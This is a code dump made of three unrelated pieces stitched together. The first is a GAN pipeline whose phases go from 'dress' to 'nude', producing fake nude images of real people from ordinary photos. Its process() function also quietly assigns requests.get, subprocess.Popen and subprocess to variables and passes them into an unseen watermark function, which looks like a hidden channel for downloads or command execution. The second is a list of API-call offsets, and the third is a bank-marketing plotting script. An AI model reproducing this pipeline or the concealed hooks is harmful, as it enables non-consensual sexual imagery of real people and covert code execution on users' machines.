B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
self.nThreads = 1 ## threads for loading data (???)
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
# Changes options accordlying to actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
|
[
"torch.nn.Dropout",
"cv2.bitwise_and",
"numpy.ones",
"numpy.clip",
"cv2.ellipse",
"cv2.rectangle",
"torchvision.transforms.Normalize",
"torch.no_grad",
"cv2.inRange",
"os.path.join",
"random.randint",
"cv2.dilate",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"torch.nn.ReflectionPad2d",
"numpy.transpose",
"cv2.split",
"torchvision.transforms.Compose",
"cv2.fitEllipse",
"cv2.resize",
"functools.partial",
"cv2.bitwise_not",
"math.ceil",
"torch.nn.Tanh",
"numpy.asarray",
"torch.nn.Conv2d",
"numpy.sort",
"cv2.bitwise_or",
"cv2.merge",
"cv2.add",
"torch.nn.ReLU",
"random.uniform",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d",
"numpy.zeros",
"math.floor",
"numpy.ma.array",
"cv2.imread",
"torch.cuda.empty_cache",
"cv2.findContours",
"torchvision.transforms.ToTensor"
] |
[((2016, 2030), 'cv2.split', 'cv2.split', (['img'], {}), '(img)\n', (2025, 2030), False, 'import cv2\n'), ((2855, 2878), 'cv2.merge', 'cv2.merge', (['out_channels'], {}), '(out_channels)\n', (2864, 2878), False, 'import cv2\n'), ((3377, 3430), 'numpy.ma.array', 'np.ma.array', (['matrix'], {'mask': 'mask', 'fill_value': 'fill_value'}), '(matrix, mask=mask, fill_value=fill_value)\n', (3388, 3430), True, 'import numpy as np\n'), ((4071, 4104), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (4079, 4104), True, 'import numpy as np\n'), ((9280, 9348), 'cv2.findContours', 'cv2.findContours', (['color_mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (9296, 9348), False, 'import cv2\n'), ((20596, 20629), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (20604, 20629), True, 'import numpy as np\n'), ((20722, 20745), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (20732, 20745), True, 'import numpy as np\n'), ((20777, 20802), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (20787, 20802), True, 'import numpy as np\n'), ((20870, 20898), 'cv2.inRange', 'cv2.inRange', (['cv_mask', 'f1', 'f2'], {}), '(cv_mask, f1, f2)\n', (20881, 20898), False, 'import cv2\n'), ((20974, 20999), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (20981, 20999), True, 'import numpy as np\n'), ((21035, 21079), 'cv2.dilate', 'cv2.dilate', (['green_mask', 'kernel'], {'iterations': '(1)'}), '(green_mask, kernel, iterations=1)\n', (21045, 21079), False, 'import cv2\n'), ((21204, 21231), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (21219, 21231), False, 'import cv2\n'), ((21317, 21377), 'cv2.bitwise_and', 'cv2.bitwise_and', (['cv_correct', 'cv_correct'], {'mask': 'green_mask_inv'}), '(cv_correct, cv_correct, mask=green_mask_inv)\n', (21332, 21377), False, 'import cv2\n'), ((21389, 21435), 'cv2.bitwise_and', 'cv2.bitwise_and', (['green', 'green'], {'mask': 'green_mask'}), '(green, green, mask=green_mask)\n', (21404, 21435), False, 'import cv2\n'), ((28940, 28974), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (28958, 28974), True, 'import torchvision.transforms as transforms\n'), ((29833, 29861), 'numpy.clip', 'np.clip', (['image_numpy', '(0)', '(255)'], {}), '(image_numpy, 0, 255)\n', (29840, 29861), True, 'import numpy as np\n'), ((2370, 2383), 'numpy.sort', 'np.sort', (['flat'], {}), '(flat)\n', (2377, 2383), True, 'import numpy as np\n'), ((5790, 5813), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (5800, 5813), True, 'import numpy as np\n'), ((5849, 5874), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (5859, 5874), True, 'import numpy as np\n'), ((6073, 6100), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (6088, 6100), False, 'import cv2\n'), ((6195, 6245), 'cv2.bitwise_and', 'cv2.bitwise_and', (['maskref', 'maskref'], {'mask': 'green_mask'}), '(maskref, maskref, mask=green_mask)\n', (6210, 6245), False, 'import cv2\n'), ((6261, 6315), 'cv2.bitwise_and', 'cv2.bitwise_and', (['details', 'details'], {'mask': 'green_mask_inv'}), '(details, details, mask=green_mask_inv)\n', (6276, 6315), False, 'import cv2\n'), ((6354, 6373), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (6361, 6373), False, 'import cv2\n'), ((8375, 8396), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (8385, 8396), True, 'import numpy as np\n'), ((8430, 8454), 'numpy.asarray', 'np.asarray', (['[10, 10, 10]'], {}), '([10, 10, 10])\n', (8440, 8454), True, 'import numpy as np\n'), ((8468, 8491), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8478, 8491), True, 'import numpy as np\n'), ((8525, 8548), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8535, 8548), True, 'import numpy as np\n'), ((8571, 8597), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8582, 8597), False, 'import cv2\n'), ((8620, 8646), 'cv2.inRange', 'cv2.inRange', (['image', 'f3', 'f4'], {}), '(image, f3, f4)\n', (8631, 8646), False, 'import cv2\n'), ((8668, 8708), 'cv2.bitwise_or', 'cv2.bitwise_or', (['color_mask1', 'color_mask2'], {}), '(color_mask1, color_mask2)\n', (8682, 8708), False, 'import cv2\n'), ((14055, 14075), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (14069, 14075), False, 'import random\n'), ((19402, 19426), 'random.uniform', 'random.uniform', (['(0.0)', '(1.0)'], {}), '(0.0, 1.0)\n', (19416, 19426), False, 'import random\n'), ((21463, 21482), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (21470, 21482), False, 'import cv2\n'), ((22787, 22811), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (22809, 22811), False, 'import torch\n'), ((23720, 23758), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir'], {}), '(self.opt.checkpoints_dir)\n', (23732, 23758), False, 'import os\n'), ((24973, 25029), 'functools.partial', 'functools.partial', (['torch.nn.InstanceNorm2d'], {'affine': '(False)'}), '(torch.nn.InstanceNorm2d, affine=False)\n', (24990, 25029), False, 'import functools\n'), ((25525, 25544), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (25538, 25544), False, 'import torch\n'), ((26684, 26711), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*model'], {}), '(*model)\n', (26703, 26711), False, 'import torch\n'), ((26908, 26927), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (26921, 26927), False, 'import torch\n'), ((28301, 28333), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*conv_block'], {}), '(*conv_block)\n', (28320, 28333), False, 'import torch\n'), ((28756, 28777), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (28775, 28777), True, 'import torchvision.transforms as transforms\n'), ((34737, 34756), 'cv2.imread', 'cv2.imread', (['i_image'], {}), '(i_image)\n', (34747, 34756), False, 'import cv2\n'), ((34827, 34887), 'cv2.resize', 'cv2.resize', (['dress', '(512, 512)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(dress, (512, 512), interpolation=cv2.INTER_CUBIC)\n', (34837, 34887), False, 'import cv2\n'), ((34959, 35019), 'cv2.resize', 'cv2.resize', (['watermark', '(w, h)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(watermark, (w, h), interpolation=cv2.INTER_CUBIC)\n', (34969, 35019), False, 'import cv2\n'), ((35028, 35059), 'cv2.imwrite', 'cv2.imwrite', (['i_image', 'watermark'], {}), '(i_image, watermark)\n', (35039, 35059), False, 'import cv2\n'), ((2440, 2473), 'math.floor', 'math.floor', (['(n_cols * half_percent)'], {}), '(n_cols * half_percent)\n', (2450, 2473), False, 'import math\n'), ((2499, 2539), 'math.ceil', 'math.ceil', (['(n_cols * (1.0 - half_percent))'], {}), '(n_cols * (1.0 - half_percent))\n', (2508, 2539), False, 'import math\n'), ((5969, 5997), 'cv2.inRange', 'cv2.inRange', (['maskref', 'f1', 'f2'], {}), '(maskref, f1, f2)\n', (5980, 5997), False, 'import cv2\n'), ((8763, 8786), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8773, 8786), True, 'import numpy as np\n'), ((8820, 8843), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8830, 8843), True, 'import numpy as np\n'), ((8865, 8891), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8876, 8891), False, 'import cv2\n'), ((9545, 9564), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cnt'], {}), '(cnt)\n', (9559, 9564), False, 'import cv2\n'), ((22240, 22279), 'cv2.cvtColor', 'cv2.cvtColor', (['cv_img', 'cv2.COLOR_BGR2RGB'], {}), '(cv_img, cv2.COLOR_BGR2RGB)\n', (22252, 22279), False, 'import cv2\n'), ((23497, 23512), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (23510, 23512), False, 'import torch\n'), ((23792, 23813), 'torch.load', 'torch.load', (['save_path'], {}), '(save_path)\n', (23802, 23813), False, 'import torch\n'), ((25563, 25590), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (25587, 25590), False, 'import torch\n'), ((25592, 25648), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['input_nc', 'ngf'], {'kernel_size': '(7)', 'padding': '(0)'}), '(input_nc, ngf, kernel_size=7, padding=0)\n', (25607, 25648), False, 'import torch\n'), ((26540, 26567), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (26564, 26567), False, 'import torch\n'), ((26569, 26626), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['ngf', 'output_nc'], {'kernel_size': '(7)', 'padding': '(0)'}), '(ngf, output_nc, kernel_size=7, padding=0)\n', (26584, 26626), False, 'import torch\n'), ((26646, 26661), 'torch.nn.Tanh', 'torch.nn.Tanh', ([], {}), '()\n', (26659, 26661), False, 'import torch\n'), ((27602, 27653), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (27617, 27653), False, 'import torch\n'), ((28192, 28243), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (28207, 28243), False, 'import torch\n'), ((28825, 28879), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (28845, 28879), True, 'import torchvision.transforms as transforms\n'), ((29770, 29806), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29782, 29806), True, 'import numpy as np\n'), ((4804, 4878), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 205, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1)\n', (4815, 4878), False, 'import cv2\n'), ((8935, 8958), 'numpy.asarray', 'np.asarray', (['[250, 0, 0]'], {}), '([250, 0, 0])\n', (8945, 8958), True, 'import numpy as np\n'), ((8986, 9009), 'numpy.asarray', 'np.asarray', (['[255, 0, 0]'], {}), '([255, 0, 0])\n', (8996, 9009), True, 'import numpy as np\n'), ((9031, 9057), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9042, 9057), False, 'import cv2\n'), ((19519, 19543), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19533, 19543), False, 'import random\n'), ((19573, 19597), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19587, 19597), False, 'import random\n'), ((25807, 25886), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(ngf * mult)', '(ngf * mult * 2)'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1)\n', (25822, 25886), False, 'import torch\n'), ((27293, 27320), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27317, 27320), False, 'import torch\n'), ((27781, 27802), 'torch.nn.Dropout', 'torch.nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (27797, 27802), False, 'import torch\n'), ((27884, 27911), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27908, 27911), False, 'import torch\n'), ((4945, 5019), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1)\n', (4956, 5019), False, 'import cv2\n'), ((9103, 9128), 'numpy.asarray', 'np.asarray', (['[250, 0, 250]'], {}), '([250, 0, 250])\n', (9113, 9128), True, 'import numpy as np\n'), ((9158, 9183), 'numpy.asarray', 'np.asarray', (['[255, 0, 255]'], {}), '([255, 0, 255])\n', (9168, 9183), True, 'import numpy as np\n'), ((9205, 9231), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9216, 9231), False, 'import cv2\n'), ((15727, 15752), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (15741, 15752), False, 'import random\n'), ((16144, 16169), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (16158, 16169), False, 'import random\n'), ((18751, 18777), 'random.uniform', 'random.uniform', (['(0.03)', '(0.09)'], {}), '(0.03, 0.09)\n', (18765, 18777), False, 'import random\n'), ((27391, 27419), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (27416, 27419), False, 'import torch\n'), ((27982, 28010), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (28007, 28010), False, 'import torch\n'), ((29682, 29718), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29694, 29718), True, 'import numpy as np\n'), ((33750, 33785), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33762, 33785), False, 'import cv2\n'), ((5079, 5157), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 255, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1)\n', (5090, 5157), False, 'import cv2\n'), ((33871, 33906), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33883, 33906), False, 'import cv2\n'), ((5221, 5297), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1)\n', (5232, 5297), False, 'import cv2\n'), ((33986, 34021), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33998, 34021), False, 'import cv2\n'), ((5360, 5434), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1)\n', (5371, 5434), False, 'import cv2\n'), ((5664, 5735), 'cv2.rectangle', 'cv2.rectangle', (['details', '(xmin, ymin)', '(xmax, ymax)', '(100, 100, 100)', '(-1)'], {}), '(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)\n', (5677, 5735), False, 'import cv2\n')]
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# We will use seaborn to create plots
import seaborn as sns
# Matplotlib will help us to draw the plots
import matplotlib.pyplot as plt
sns.set(color_codes=True)
# Import pandas to manage data set
import pandas as pd
# Import NumPy for all mathematics operations on numerical data
import numpy as np
# Let's load the pre-processed version of data set
file_name = 'bank_data_test.csv'
# Load into a variable using pandas read_csv
data = pd.read_csv(file_name, delimiter=',')
# Let's verify the size of data set
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Let's see a brief summary of some variables
print(data.describe()[['age','duration','campaign','pdays']])
'''
age duration campaign pdays
count 41188.00000 41188.000000 41188.000000 41188.000000
mean 40.02406 258.285010 2.567593 962.475454
std 10.42125 259.279249 2.770014 186.910907
min 17.00000 0.000000 1.000000 0.000000
25% 32.00000 102.000000 1.000000 999.000000
50% 38.00000 180.000000 2.000000 999.000000
75% 47.00000 319.000000 3.000000 999.000000
max 98.00000 4918.000000 56.000000 999.000000
'''
# Let's extract the output variable using it's column name
y = data.y
# We will shuffle the data set before visualization
data = data.reindex(np.random.permutation(data.index))
# Here we will plot it, and count instances for different class
ax = sns.countplot(y,label="Count")
No, Yes= y.value_counts()
print('Number of to be subscriber: ',Yes)
print('Number of not to be subscriber : ',No)
'''
Number of to be subscriber: 36548
Number of not to be subscriber : 4640
'''
# Here show the created plots
plt.show()
# We will create 4 distribution plots
f, axes = plt.subplots(nrows=2,ncols=2, figsize=(15, 6))
# Monthly marketing activity
sns.distplot(data['month_integer'], kde=False, color="#ff3300", ax=axes[0][0]).set_title('Months of Marketing Activity Distribution')
axes[0][0].set_ylabel('Potential Clients Count')
axes[0][0].set_xlabel('Months')
# Potential subscriber on Age basis
sns.distplot(data['age'], kde=False, color="#3366ff", ax=axes[0][1]).set_title('Age of Potentical Clients Distribution')
axes[0][1].set_ylabel('Potential Clients Count')
axes[0][1].set_xlabel('Age')
# Potential subscriber on Job basis
sns.distplot(data['campaign'], kde=False, color="#546E7A", ax=axes[1][0]).set_title('Calls Received in the Marketing Campaign')
axes[1][0].set_ylabel('Potential Clients Count')
axes[1][0].set_xlabel('Campaign')
# Jobs
sns.distplot(data['job'], kde=False, color="#33ff66", ax=axes[1][1]).set_title('Potential clients on Job basis')
axes[1][1].set_ylabel('Potential Clients Count')
axes[1][1].set_xlabel('Job Type')
#Show all created plots
plt.show()
# We will first remove output variable from data
x = data
# Store output variable
y = data.y
# Now let's plot correlation between all the features
# Define figure size
f,ax = plt.subplots(figsize=(15, 15))
# Create correlation plot using seaborn
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax)
corr = x.corr()
# plot the correlations
plt.show()
# We will drop highly correlated features
drop_list = ['emp.var.rate','nr.employed','cons.price.idx','euribor3m','previous']
#Let's remove the redundant features
data = x.drop(drop_list,axis = 1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
